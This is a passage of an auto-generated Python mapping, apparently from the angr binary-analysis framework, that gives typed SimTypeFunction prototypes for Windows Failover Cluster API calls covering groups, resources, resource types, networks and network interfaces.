'ClusterResourceEnumEx': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HRESENUMEX", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"dwVersion": SimTypeInt(signed=False, label="UInt32"), "cbId": SimTypeInt(signed=False, label="UInt32"), "lpszId": SimTypePointer(SimTypeChar(label="Char"), offset=0), "cbName": SimTypeInt(signed=False, label="UInt32"), "lpszName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "cbOwnerGroupName": SimTypeInt(signed=False, label="UInt32"), "lpszOwnerGroupName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "cbOwnerGroupId": SimTypeInt(signed=False, label="UInt32"), "lpszOwnerGroupId": SimTypePointer(SimTypeChar(label="Char"), offset=0), "cbProperties": SimTypeInt(signed=False, label="UInt32"), "pProperties": SimTypePointer(SimTypeBottom(label="Void"), offset=0), "cbRoProperties": SimTypeInt(signed=False, label="UInt32"), "pRoProperties": SimTypePointer(SimTypeBottom(label="Void"), offset=0)}, name="CLUSTER_RESOURCE_ENUM_ITEM", pack=False, align=None), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hResourceEnumEx", "dwIndex", "pItem", "cbItem"]),
#
'ClusterResourceCloseEnumEx': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HRESENUMEX", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hResourceEnumEx"]),
#
'OnlineClusterGroupEx': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUP", pack=False, align=None), offset=0), SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hGroup", "hDestinationNode", "dwOnlineFlags", "lpInBuffer", "cbInBufferSize"]),
#
'OfflineClusterGroupEx': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUP", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hGroup", "dwOfflineFlags", "lpInBuffer", "cbInBufferSize"]),
#
'OnlineClusterResourceEx': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HRESOURCE", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hResource", "dwOnlineFlags", "lpInBuffer", "cbInBufferSize"]),
#
'OfflineClusterResourceEx': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HRESOURCE", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hResource", "dwOfflineFlags", "lpInBuffer", "cbInBufferSize"]),
#
'MoveClusterGroupEx': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUP", pack=False, align=None), offset=0), SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hGroup", "hDestinationNode", "dwMoveFlags", "lpInBuffer", "cbInBufferSize"]),
#
'CancelClusterGroupOperation': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUP", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hGroup", "dwCancelFlags_RESERVED"]),
#
'RestartClusterResource': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HRESOURCE", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hResource", "dwFlags"]),
#
'CloseClusterGroup': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUP", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hGroup"]),
#
'GetClusterFromGroup': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUP", pack=False, align=None), offset=0)], SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), arg_names=["hGroup"]),
#
'GetClusterGroupState': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUP", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="CLUSTER_GROUP_STATE"), arg_names=["hGroup", "lpszNodeName", "lpcchNodeName"]),
#
'SetClusterGroupName': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUP", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hGroup", "lpszGroupName"]),
#
'SetClusterGroupNodeList': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUP", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0), label="LPArray", offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hGroup", "NodeCount", "NodeList"]),
#
'OnlineClusterGroup': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUP", pack=False, align=None), offset=0), SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hGroup", "hDestinationNode"]),
#
'MoveClusterGroup': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUP", pack=False, align=None), offset=0), SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hGroup", "hDestinationNode"]),
#
'OfflineClusterGroup': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUP", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hGroup"]),
#
'DeleteClusterGroup': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUP", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hGroup"]),
#
'DestroyClusterGroup': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUP", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hGroup"]),
#
'ClusterGroupOpenEnum': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUP", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypePointer(SimStruct({}, name="_HGROUPENUM", pack=False, align=None), offset=0), arg_names=["hGroup", "dwType"]),
#
'ClusterGroupGetEnumCount': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUPENUM", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hGroupEnum"]),
#
'ClusterGroupEnum': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUPENUM", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hGroupEnum", "dwIndex", "lpdwType", "lpszResourceName", "lpcchName"]),
#
'ClusterGroupCloseEnum': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUPENUM", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hGroupEnum"]),
#
'CreateClusterResource': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUP", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypePointer(SimStruct({}, name="_HRESOURCE", pack=False, align=None), offset=0), arg_names=["hGroup", "lpszResourceName", "lpszResourceType", "dwFlags"]),
#
'OpenClusterResource': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypePointer(SimStruct({}, name="_HRESOURCE", pack=False, align=None), offset=0), arg_names=["hCluster", "lpszResourceName"]),
#
'OpenClusterResourceEx': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypePointer(SimStruct({}, name="_HRESOURCE", pack=False, align=None), offset=0), arg_names=["hCluster", "lpszResourceName", "dwDesiredAccess", "lpdwGrantedAccess"]),
#
'CloseClusterResource': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HRESOURCE", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hResource"]),
#
'GetClusterFromResource': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HRESOURCE", pack=False, align=None), offset=0)], SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), arg_names=["hResource"]),
#
'DeleteClusterResource': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HRESOURCE", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hResource"]),
#
'GetClusterResourceState': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HRESOURCE", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="CLUSTER_RESOURCE_STATE"), arg_names=["hResource", "lpszNodeName", "lpcchNodeName", "lpszGroupName", "lpcchGroupName"]),
#
'SetClusterResourceName': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HRESOURCE", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hResource", "lpszResourceName"]),
#
'FailClusterResource': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HRESOURCE", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hResource"]),
#
'OnlineClusterResource': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HRESOURCE", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hResource"]),
#
'OfflineClusterResource': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HRESOURCE", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hResource"]),
#
'ChangeClusterResourceGroup': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HRESOURCE", pack=False, align=None), offset=0), SimTypePointer(SimStruct({}, name="_HGROUP", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hResource", "hGroup"]),
#
'ChangeClusterResourceGroupEx': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HRESOURCE", pack=False, align=None), offset=0), SimTypePointer(SimStruct({}, name="_HGROUP", pack=False, align=None), offset=0), SimTypeLongLong(signed=False, label="UInt64")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hResource", "hGroup", "Flags"]),
#
'AddClusterResourceNode': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HRESOURCE", pack=False, align=None), offset=0), SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hResource", "hNode"]),
#
'RemoveClusterResourceNode': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HRESOURCE", pack=False, align=None), offset=0), SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hResource", "hNode"]),
#
'AddClusterResourceDependency': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HRESOURCE", pack=False, align=None), offset=0), SimTypePointer(SimStruct({}, name="_HRESOURCE", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hResource", "hDependsOn"]),
#
'RemoveClusterResourceDependency': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HRESOURCE", pack=False, align=None), offset=0), SimTypePointer(SimStruct({}, name="_HRESOURCE", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hResource", "hDependsOn"]),
#
'SetClusterResourceDependencyExpression': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HRESOURCE", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hResource", "lpszDependencyExpression"]),
#
'GetClusterResourceDependencyExpression': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HRESOURCE", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hResource", "lpszDependencyExpression", "lpcchDependencyExpression"]),
#
'AddResourceToClusterSharedVolumes': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HRESOURCE", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hResource"]),
#
'RemoveResourceFromClusterSharedVolumes': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HRESOURCE", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hResource"]),
#
'IsFileOnClusterSharedVolume': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpszPathName", "pbFileIsOnSharedVolume"]),
#
'ClusterSharedVolumeSetSnapshotState': SimTypeFunction([SimTypeBottom(label="Guid"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="CLUSTER_SHARED_VOLUME_SNAPSHOT_STATE")], SimTypeInt(signed=False, label="UInt32"), arg_names=["guidSnapshotSet", "lpszVolumeName", "state"]),
#
'CanResourceBeDependent': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HRESOURCE", pack=False, align=None), offset=0), SimTypePointer(SimStruct({}, name="_HRESOURCE", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hResource", "hResourceDependent"]),
#
'ClusterResourceControl': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HRESOURCE", pack=False, align=None), offset=0), SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hResource", "hHostNode", "dwControlCode", "lpInBuffer", "cbInBufferSize", "lpOutBuffer", "cbOutBufferSize", "lpBytesReturned"]),
#
'ClusterResourceControlAsUser': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HRESOURCE", pack=False, align=None), offset=0), SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hResource", "hHostNode", "dwControlCode", "lpInBuffer", "cbInBufferSize", "lpOutBuffer", "cbOutBufferSize", "lpBytesReturned"]),
#
'ClusterResourceTypeControl': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hCluster", "lpszResourceTypeName", "hHostNode", "dwControlCode", "lpInBuffer", "nInBufferSize", "lpOutBuffer", "nOutBufferSize", "lpBytesReturned"]),
#
'ClusterResourceTypeControlAsUser': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hCluster", "lpszResourceTypeName", "hHostNode", "dwControlCode", "lpInBuffer", "nInBufferSize", "lpOutBuffer", "nOutBufferSize", "lpBytesReturned"]),
#
'ClusterGroupControl': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUP", pack=False, align=None), offset=0), SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hGroup", "hHostNode", "dwControlCode", "lpInBuffer", "nInBufferSize", "lpOutBuffer", "nOutBufferSize", "lpBytesReturned"]),
#
'ClusterNodeControl': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0), SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hNode", "hHostNode", "dwControlCode", "lpInBuffer", "nInBufferSize", "lpOutBuffer", "nOutBufferSize", "lpBytesReturned"]),
#
'GetClusterResourceNetworkName': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HRESOURCE", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hResource", "lpBuffer", "nSize"]),
#
'ClusterResourceOpenEnum': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HRESOURCE", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypePointer(SimStruct({}, name="_HRESENUM", pack=False, align=None), offset=0), arg_names=["hResource", "dwType"]),
#
'ClusterResourceGetEnumCount': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HRESENUM", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hResEnum"]),
#
'ClusterResourceEnum': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HRESENUM", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hResEnum", "dwIndex", "lpdwType", "lpszName", "lpcchName"]),
#
'ClusterResourceCloseEnum': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HRESENUM", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hResEnum"]),
#
'CreateClusterResourceType': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hCluster", "lpszResourceTypeName", "lpszDisplayName", "lpszResourceTypeDll", "dwLooksAlivePollInterval", "dwIsAlivePollInterval"]),
#
'DeleteClusterResourceType': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hCluster", "lpszResourceTypeName"]),
#
'ClusterResourceTypeOpenEnum': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypePointer(SimStruct({}, name="_HRESTYPEENUM", pack=False, align=None), offset=0), arg_names=["hCluster", "lpszResourceTypeName", "dwType"]),
#
'ClusterResourceTypeGetEnumCount': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HRESTYPEENUM", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hResTypeEnum"]),
#
'ClusterResourceTypeEnum': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HRESTYPEENUM", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hResTypeEnum", "dwIndex", "lpdwType", "lpszName", "lpcchName"]),
#
'ClusterResourceTypeCloseEnum': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HRESTYPEENUM", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hResTypeEnum"]),
#
'OpenClusterNetwork': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypePointer(SimStruct({}, name="_HNETWORK", pack=False, align=None), offset=0), arg_names=["hCluster", "lpszNetworkName"]),
#
'OpenClusterNetworkEx': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypePointer(SimStruct({}, name="_HNETWORK", pack=False, align=None), offset=0), arg_names=["hCluster", "lpszNetworkName", "dwDesiredAccess", "lpdwGrantedAccess"]),
#
'CloseClusterNetwork': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNETWORK", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hNetwork"]),
#
'GetClusterFromNetwork': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNETWORK", pack=False, align=None), offset=0)], SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), arg_names=["hNetwork"]),
#
'ClusterNetworkOpenEnum': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNETWORK", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypePointer(SimStruct({}, name="_HNETWORKENUM", pack=False, align=None), offset=0), arg_names=["hNetwork", "dwType"]),
#
'ClusterNetworkGetEnumCount': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNETWORKENUM", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hNetworkEnum"]),
#
'ClusterNetworkEnum': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNETWORKENUM", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hNetworkEnum", "dwIndex", "lpdwType", "lpszName", "lpcchName"]),
#
'ClusterNetworkCloseEnum': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNETWORKENUM", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hNetworkEnum"]),
#
'GetClusterNetworkState': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNETWORK", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="CLUSTER_NETWORK_STATE"), arg_names=["hNetwork"]),
#
'SetClusterNetworkName': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNETWORK", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hNetwork", "lpszName"]),
#
'GetClusterNetworkId': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNETWORK", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hNetwork", "lpszNetworkId", "lpcchName"]),
#
'ClusterNetworkControl': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNETWORK", pack=False, align=None), offset=0), SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hNetwork", "hHostNode", "dwControlCode", "lpInBuffer", "nInBufferSize", "lpOutBuffer", "nOutBufferSize", "lpBytesReturned"]),
#
'OpenClusterNetInterface': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypePointer(SimStruct({}, name="_HNETINTERFACE", pack=False, align=None), offset=0), arg_names=["hCluster", "lpszInterfaceName"]),
#
'OpenClusterNetInterfaceEx': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypePointer(SimStruct({}, name="_HNETINTERFACE", pack=False, align=None), offset=0), arg_names=["hCluster", "lpszInterfaceName", "dwDesiredAccess", "lpdwGrantedAccess"]),
#
'GetClusterNetInterface': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hCluster", "lpszNodeName", "lpszNetworkName", "lpszInterfaceName", "lpcchInterfaceName"]),
#
'CloseClusterNetInterface': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNETINTERFACE", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hNetInterface"]),
#
'GetClusterFromNetInterface': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNETINTERFACE", pack=False, align=None), offset=0)], SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), arg_names=["hNetInterface"]),
#
'GetClusterNetInterfaceState': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNETINTERFACE", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="CLUSTER_NETINTERFACE_STATE"), arg_names=["hNetInterface"]),
#
